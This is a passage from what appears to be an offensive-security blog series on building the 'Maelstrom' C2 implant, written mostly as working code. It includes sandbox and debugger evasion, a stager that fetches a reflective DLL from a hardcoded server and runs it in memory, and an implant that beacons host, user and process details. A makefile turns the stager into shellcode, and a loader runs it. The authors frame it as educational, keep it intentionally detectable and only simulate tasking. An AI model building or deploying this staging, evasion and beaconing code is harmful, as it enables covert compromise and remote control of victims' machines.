Sandboxes are a great way to automate and identify what the purpose of malware is. Essentially, they run malware inside an isolated virtual machine, watch its behaviour, report on it.

Commonly, these are small virtual machines with a limited amount of time they can wait. Some common solutions to handling sandboxes:

  • Waiting for the expiration time (usually 180 seconds)

  • Only executing if not in a virtual machine

  • Only executing if a disk size is above a certain threshold

They are just a few to consider, in the case of maelstrom we simply check RAM size > 4:

BOOL IsInSandbox(API Api) {
    MEMORYSTATUSEX memStatus;

    memStatus.dwLength = sizeof(memStatus);

    ((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
    float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
    if (fSz > 4) {
        return FALSE;
    }
    return TRUE;
}

If this function is true, then we continue.

Combined with a sleep:

void InternalSleep(API Api, DWORD DwSleep) {
    ((SLEEP)Api.Sleep)(DwSleep);
}

Anti-Debug

Anti-Debug, again, is about creativity. Repos such as LordNoteworthy/al-khaser contain loads of examples of this, however Maelstrom keeps this simple:

BOOL IsBeingDebugged() {
    PPEB pPeb = (PPEB)PPEB_PTR;

    if (pPeb->BeingDebugged == 1) {
        return TRUE;
    }
    else {
        return FALSE;
    }
}

Read the PEB Struct, check if BeingDebugged is set to 1. Simple. Looking at the AntiDebug section of Al-Khaser there are tons methods, just implement these as/when needed.

These techniques are useful at hindering the blue teams if the payload is retrieved; it will slow them down from identifying the purpose of the malware, as well as furthering identifying the server. This should not be the only method of doing this. For example, if it is debugged and the IPs of the server are found, then there should be server side protections to control which implants are allowed to communicate with the server.

Downloading the Reflective DLL

For this, we will use WinHTTP as the code is ready an accessible. However, this is a fairly older library and WinInet is more modern. For readability of code, the following struct is defined:

typedef struct DLL_ {
    LPVOID Buffer;
    DWORD Size;
}
DLL, * PDLL;

And then passed into the function:

BOOL GetReflectiveDLL(API api, PDLL Dll)

We'll get to that shortly. But first, the config of the request is defined:

WCHAR wVerb[4] = {
  'G', 'E', 'T', 0
};

WCHAR wEndpoint[9] = {
  '/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};

WCHAR wUserAgent[10] = {
  'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', 0
};

WCHAR wVersion[5] = {
  'H', 'T', 'T', 'P', 0
};

WCHAR wServer[13] = {
  '1', '0', '.', '1', '0', '.', '1', '1', '.', '2', '0', '5', 0
};

WCHAR wReferer[19] = {
  'h', 't', 't', 'p', 's', ':', '/', '/', 'g', 'o', 'o', 'g', 'l', 'e', '.', 'c', 'o', 'm', 0
};

WCHAR wHeaders[22] = {
  'X', '-', 'M', 'a', 'e', 'l', 's', 't', 'r', 'o', 'm', ':', ' ', 'p', 'a', 's', 's', 'w', 'o', 'r', 'd', 0
};

These strings are hard-coded in the function has does not support any sort of update. Also, the password in which the server is requiring is hardcoded in the header. Finally, these strings are in the array format so that they are placed within the .text section.

We now create a few variables, including the port:

DWORD dwPort = 5555;
BOOL bSSL = FALSE;
BOOL bProxy = FALSE;

DWORD dwSz = 0;
DWORD dwDownloaded = 0;
DWORD dwTotalRead = 0;
long lpBuffer = -1;
DWORD lpdwBufferLength = sizeof(lpBuffer);
BOOL bSetOptions = FALSE;

DWORD dwFlagsWinHttpOpenRequest = 0;
DWORD dwAllowBadCerts = 0;

HINTERNET hSession = NULL;
HINTERNET hConnect = NULL;
HINTERNET hRequest = NULL;
BOOL bSentRequest = FALSE;
BOOL bReceieveRequest = FALSE;
BOOL bHeadersQueried = FALSE;
BOOL bHeadersAdded = FALSE;
WINHTTP_AUTOPROXY_OPTIONS autoProxyOptions;
WINHTTP_PROXY_INFO proxyInfo;
DWORD dwProxyInfoSz = sizeof(proxyInfo);

We aren't going to step through the code, but there are a few things to point out.

If its SSL, set these flags:

if (bSSL) {
    dwFlagsWinHttpOpenRequest = WINHTTP_FLAG_SECURE;
    dwAllowBadCerts = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
}

And:

if (bSSL) {
    bSetOptions = ((WINHTTPSETOPTION)api.WinHttpSetOption)(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwAllowBadCerts, sizeof(dwAllowBadCerts));
    if (bSetOptions == FALSE) {
        return FALSE;
    }
}

Then, this is how headers are added:

bHeadersAdded = ((WINHTTPADDREQUESTHEADERS)api.WinHttpAddRequestHeaders)(hRequest, (LPCWSTR)&wHeaders, (DWORD)-1, WINHTTP_ADDREQ_FLAG_REPLACE | WINHTTP_ADDREQ_FLAG_ADD);
if (bHeadersAdded == FALSE) {
    return FALSE;
}

If multiple headers are required, then the WCHAR needs to have them in the same string and containing the \r as per the RFC.

After the request is done, we fill the structure:

Dll->Buffer = Buffer;
Dll->Size = dwTotalRead;

if (Dll->Size > 0) {
    return TRUE;
}
else {
    return FALSE;
}

The entire process is encapsulated in the following request:

if (GetReflectiveDLL(Api, &Dll) == FALSE) {
    return -1;
}

Loading a Reflective DLL

In the stage 1 section we will discuss why a Reflective DLL was chosen and what it is, but for now lets discuss how it will be loaded. For reference, here is the code used to execute the DLL:

int LoadReflectiveDll(API Api, DLL Dll) {
    LPVOID pAddress = NULL;
    DWORD lpflOldProtect = 0;
    BOOL bProtect = FALSE;
    DWORD dwLdrOffset = 0;
    PTHREAD_START_ROUTINE pRoutine = NULL;
    HANDLE hThread = NULL;

    pAddress = ((VIRTUALALLOC)Api.VirtualAlloc)(0, Dll.Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (pAddress == NULL) {
        return 1;
    }

    Memcpy(pAddress, Dll.Buffer, Dll.Size);

    bProtect = ((VIRTUALPROTECT)Api.VirtualProtect)(pAddress, Dll.Size, PAGE_EXECUTE_READ, &lpflOldProtect);
    if (bProtect == FALSE) {
        return 1;
    }

    dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
    if (dwLdrOffset == 0) {
        return 1;
    }

    pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = ((CREATETHREAD)Api.CreateThread)(NULL, 0, pRoutine, NULL, 0, NULL);
    if (hThread == NULL) {
        return 1;
    }
    ((WAITFORSINGLEOBJECT)Api.WaitForSingleObject)(hThread, INFINITE);

    ((VIRTUALFREE)Api.VirtualFree)(pAddress, 0, MEM_RELEASE);
    return 0;
}

memcpy is reimplemented using the source code:

void * Memcpy (void *dest, const void *src, size_t len)
{
  char *d = dest;
  const char *s = src;
  while (len--)
    *d++ = *s++;
  return dest;
}

We discussed this earlier on, but lets revisit. We first need to identify the offset of the export function so we can get the proper address to start a thread on the function:

dwLdrOffset = GetReflectiveLoaderOffset(Dll.Buffer);
if (dwLdrOffset == 0) {
    return 1;
}

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

Lets go over the GetReflectiveLoaderOffset() function.

The function is declared like so:

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)

The parameter taken in here is the unsigned char* buffer containing the DLL retrieved from the server.

First things first, define the exported function name:

CHAR cReflectiveLoader[17] = {
    'R', 'e', 'f', 'l', 'e', 'c', 't', 'i', 'v', 'e', 'L', 'o', 'a', 'd', 'e', 'r', 0
};

With that, the next thing that happens is the IMAGE_DOS_HEADER struct is identified within the buffer:

uExportDirectory = uBase + ((PIMAGE_DOS_HEADER)uBase)->e_lfanew;

The struct:

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

From here, the IMAGE_NT_HEADERS are extracted:

if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x010B) // PE32
{
    if (dwCompiledArch != 1)
        return 0;
}
else if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x020B) // PE64
{
    if (dwCompiledArch != 2)
        return 0;
}
else
{
    return 0;
}

The struct:

typedef struct _IMAGE_NT_HEADERS64 {
  DWORD                   Signature;
  IMAGE_FILE_HEADER       FileHeader;
  IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Extract the export directory, the virtual addresses, and so on:

uEntryExport = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
uExportDirectory = uBase + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uEntryExport)->VirtualAddress, uBase);
uEntryExport = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNames, uBase);
uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
uOrdinals = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNameOrdinals, uBase);
dwNumberOfNames = ((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->NumberOfNames;

And then loop over all the exported function names by casting the RVA to an offset:

char* exportedFunction = (char*)(uBase + Rva2Offset(DEREF_32(uEntryExport), uBase));

Where RVA2offset() is:

DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
    WORD wIndex = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders = NULL;

    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if (dwRva < pSectionHeader[0].PointerToRawData)
        return dwRva;

    for (wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
    {
        if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
            return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
    }

    return 0;
}

Then, using a custom strstr, compare the export name with the one we hardcoded at the start:

if (STRSTR(exportedFunction, cReflectiveLoader) != NULL)
{
    uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
    uAddress += (DEREF_16(uOrdinals) * sizeof(DWORD));
    return Rva2Offset(DEREF_32(uAddress), uBase);
}

At this point, there should be some clear OpSec issues, if they're not obvious, we will point them out in the next few sections!

Once this is done, and the base address of the exported function is achieved, we can simple start a thread on it:

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

hThread = ((CREATETHREAD)api.CreateThread_t)(NULL, 0, pRoutine, NULL, 0, NULL);
if (hThread == NULL)
{
    return 1;
}
((WAITFORSINGLEOBJECT)api.WaitForSingleObject_t)(hThread, INFINITE);

Aside from the glaring IOC here, there is one missing WinAPI call which would operate as a cleanup... More on that in the OpSec review posts.

Maelstrom's Entry-point

This is currently how the stager looks:

int run() {

    API Api = {
        0
    };

    DLL Dll = {
        0
    };

    if (ResolveAPIs(&Api) == FALSE) {
        return -1;
    }

#ifdef SAFE
    if (SafetyChecks(Api) == FALSE) {
        return -1;
    }
#endif

    if (GetReflectiveDLL(Api, &Dll) == FALSE) {
        return -1;
    }

    LoadReflectiveDll(Api, Dll);

    return 0;
}

We deem this as the safe version, as it has all the checks we discussed. As SAFE is a preprocessor definition, we can control whether or not its used by passing the -DSAFE flag to MingW.

The makefile:

CC         =   x86_64-w64-mingw32-gcc
LINKER      =   x86_64-w64-mingw32-ld
OBJCOPY     =   x86_64-w64-mingw32-objcopy
FLAGS       =   -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c
LINKERFLAGS =   -Wl,-Tscripts/linker.ld,--no-seh
SAFE        =   bin/maelstrom.safe.x64
UNSAFE      =   bin/maelstrom.unsafe.x64
SOURCE      =   $(wildcard src/*.c)

safe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) -DSAFE $(LINKERFLAGS) -o $(SAFE).o

    $(LINKER) -s bin/adjuststack.o $(SAFE).o -o $(SAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(SAFE).exe $(SAFE).bin

    rm bin/*.o

unsafe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) $(LINKERFLAGS) -o $(UNSAFE).o

    $(LINKER) -s bin/adjuststack.o $(UNSAFE).o -o $(UNSAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(UNSAFE).exe $(UNSAFE).bin

    rm bin/*.o

For the eagle-eyed, this is fully position-independent and we can show this at the end of the post.

Stage 1

Stage 1, or Maelstrom.x64.dll, is the actual implant. As tempting as it is to utilize a typical PE and operate out of main, its probably best not to. If something like sRDI is used, or Donut, they work by bootstrapping the PE. To avoid this, and any other complication, we found a Reflective DLL to be the most effective, and easiest to work with.

Custom Reflective Loader

As we discussed earlier on, Stephen Fewer provided the first proof-of-concept of Reflective DLLs. Since then, the community has developed a few iterations:

For our demonstration, we will use the original proof-of-concept as this uses common IOCs which we want to keep in the project to ensure that Maelstrom is easily detectable.

DLLMain

Once the DLL has been loaded from the Stage 0, DllMain will be:

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    HANDLE hThread = NULL;
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:

#ifndef _DEBUG
        hThread = CreateThread(NULL, NULL, Maelstrom, NULL, 0, NULL);
        CloseHandle(hThread);
#endif

    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

When the DLL load reason is DLL_PROCESS_ATTACH, a new thread is created on Maelstrom() which looks like this:

DWORD WINAPI Maelstrom()
{
    // Gather initial info
    PCHAR machineInfo = GetMachineInfo();

    // Check-in
    if (Initialise(machineInfo) == FALSE)
    {
        return -1;
    }

    // do some commands
    Start();

    return 0;
}

DLL Debugging

To debug this in Visual Studio, the pre-processor definition of _DEBUG is checked for. If its not present, then allow for the thread to be created. Otherwise we resolve this function:

#ifdef _DEBUG
DLLEXPORT void DebugExport()
{
    Maelstrom();
}
#endif

And a seperate loader was written to debug it:

#include <Windows.h>

typedef void (*DebugExport)();

int main(int argc, char* argv[])
{
    HMODULE hModule = LoadLibraryA("maelstrom.1.dll");
    DebugExport f = reinterpret_cast<DebugExport>(GetProcAddress(hModule, "DebugExport"));
    f();
    return 0;
}

We found this to be a cleaner debugging experience than messing with x64dbg.

Checking In

As soon as the implant is launched, the first thing to occur is some basic enumeration which will identify the host:

char* GetMachineInfo()
{
    CHAR lpProcessName[MAX_PATH];
    CHAR lpComputerName[MAX_PATH];
    CHAR lpUserName[MAX_PATH];
    DWORD nSize = MAX_PATH;

    if (!GetComputerNameA(lpComputerName, &nSize))
    {
        return NULL;
    }

    if (!GetUserNameA(lpUserName, &nSize))
    {
        return NULL;
    }

    if (!GetModuleFileNameA(NULL, lpProcessName, MAX_PATH))
    {
        return NULL;
    }

    DWORD dwPid = GetCurrentProcessId();

    char* data = malloc(MAX_PATH * 5);

    if (!data)
    {
        return NULL;
    }

    sprintf(data,
        "{ \"init\": {\"processname\": \"%s\", \"computername\": \"%s\", \"username\": \"%s\", \"dwpid\": \"%ld\"}}",
        lpProcessName, lpComputerName, lpUserName, dwPid);

    Xor(data, strlen(data), 0xff);

    return data;

}

In the code above, the process, computer, and username are packed into a json string, along with the process ID. This is just XOR'd with a hardcoded hex value as a proof-of-concept. In a production C2, this should be encrypted with something like AES256-CBC or an equivalent encryption algorithm. As this is an example project, we don't care for this step.

This is something discussed in Maelstrom: Building the Team Server, and it was making the data being sent between client and server difficult to read. Whether its layers of encryption, or masking data as a MAC Address; we highly recommend something is done to transform the data. For this demo, we don't care about any of that, so its just sent to the Initialise() function:

// Gather initial info
char* machineInfo = GetMachineInfo();

// Check-in
if (Initialise(machineInfo) == FALSE)
{
    return;
}

Which is just a wrapper around the SendRequestA() function:

BOOL Initialise(char* machineInfo)
{
    if (SendRequestA(machineInfo))
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}

The SendRequestA() function uses WinHTTP, and relies on a bunch of WinAPI Calls. So, lets get into the configuration of the requests.

Similarly to stage 0, the config is hard-coded:

LPCWSTR wVerb = L"GET";
LPCWSTR wEndpoint = L"/a";
LPCWSTR wUserAgent = L"Maelstrom";
LPCWSTR wVersion = L"HTTP 1/1";
LPCWSTR wServer = L"10.10.11.205";
LPCWSTR wReferer = L"https://google.com";
LPCWSTR wHeaders = L"X-Maelstrom: password";

And some additional config:

int port = 5555;
BOOL bSsl = FALSE;
BOOL bProxy = FALSE;

Again, to repeat ourselves, do not leave these hard-coded.

Once it has initialised, we hit Start():

void Start()
{
    printf("Starting...\n");
    BOOL bRun = TRUE;
    DWORD dwOp = rand() % 4 + 1;
    
    while (bRun)
    {
        switch (dwOp)
        {
        case 0:
            printf("Simulating Task: 0\n");
            Sleep(5000);
            break;
        case 1:
            printf("Simulating Task: 1\n");
            Sleep(5000);
            break;
        case 2:
            printf("Simulating Task: 2\n");
            Sleep(5000);
            break;
        case 3:
            printf("Simulating Task: 3\n");
            Sleep(5000);
            break;
        }
        printf("Sleeping...\n");
        Sleep(10000);
    }
}

This is our simulation of tasking. Essentially it is operating as the component of the implant which will check, run, and return tasks. We are not providing that functionality though.

Safe Sleeping

One of the important ones is how the implant will look in memory in between operations. If the implant is just idling with nothing to do, it should sleep in such a way that memory scanners or engineers cannot easily identify it as malicious. This is something we will look at more in the runtime analysis, but lets take a quick look. If Process Hacker is used and the RWX region identified, this is how the region looks:

In the above, we can see the MZ Header, the DOS Message, and various section names. This needs to be removed, but we will not be providing a solution to this as we want to align with the objectives we set out in section one; but we will offer some example projects for the enthusiastic reader:

On May 5th 2022, Austin Hudson posted a tweet with a blog: Studying “Next Generation Malware” - NightHawk’s Attempt At Obfuscate and Sleep

This blog went through how Austin was able to identify a sample of Nighthawk which is a proprietary C2 from a UK-based Cyber Security Consultancy, MDSec. In this post, Austin discusses how the technique uses thread contexts and callbacks to flip the memory regions permissions (which we will discuss further in later posts).

For clarity, the research efforts for this technique, on behalf of MDSec, was Peter Winter-Smith and modexp.

Once the proof-of-concept was made public by Austin, C5pider then built it out into an open-source tool called Ekko. However, this proof-of-concept uses the base address of the entire image as the region to protect, this only works when the malware is the entire EXE on disk, or loaded as a proper DLL. This can be seen on line 36:

ImageBase   = GetModuleHandleA( NULL );

In the event that malware wants to load in the implant entirely through memory, so something like a Reflective DLL, this technique will not work as the GetModuleHandleA call will get the base address of the image the DLL is being loaded into. For example, say the DLL is being reflectively loaded into calc.exe, then the GetModuleHandleA will be the base of calc.exe.

Producing Shellcode for Loaders and Droppers

As we already have stage 0 as position independent which generates both an exe and bin for each stage 0 type, we can easily get the hex from the bin with:

xxd -i maelstrom.x64.unsafe.bin > shellcode.h

Produces:

unsigned char shellcode_bin[] = {
  /* Too Long */
};
unsigned int shellcode_bin_len = 5248;

This can then be loaded with:

#include <stdio.h>
#include <windows.h>
#include "buf.h"

int main()
{
    LPVOID pAddress = VirtualAlloc(nullptr, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pAddress, buf, buf_len);
    HANDLE hThread = CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)pAddress, nullptr, 0, nullptr);
    Sleep(10000);
    return 0;
}

Instead of calling WaitForSingleObject on the thread, we use a Sleep in the above because the shellcode will create a new thread and exit when the RDLL is loaded, causing the thread we are waiting on to exit successfully. So, for demonstration purposes, we just sleep.

Bare in mind, with the SAFE defined, it goes up to 8192.

To see how Metasploit got their payload so small, see block_reverse_https.asm and the build script at build.py.

Now that shellcode is achieved and is loadable, this can now be wrapped in any shellcode loader:

  • .NET

  • Go

  • Rust

  • Nim

You name it, it should work!

Conclusion

After long last, we finally have some code that runs, and a plan for more functionality and security. There are manifold ways to progress the implant from here, from improving the implant's operational security to fleshing out its communication channels.

This blog post has been pretty heavily in favour of the offense, and light on operational security. As we've discussed, defensive techniques such as hooking AMSI and ETW TI present a potent limitation on the operational security of the implant. Our next two posts will look at these protections, how they work, and how an implant can attempt to bypass them.

Last updated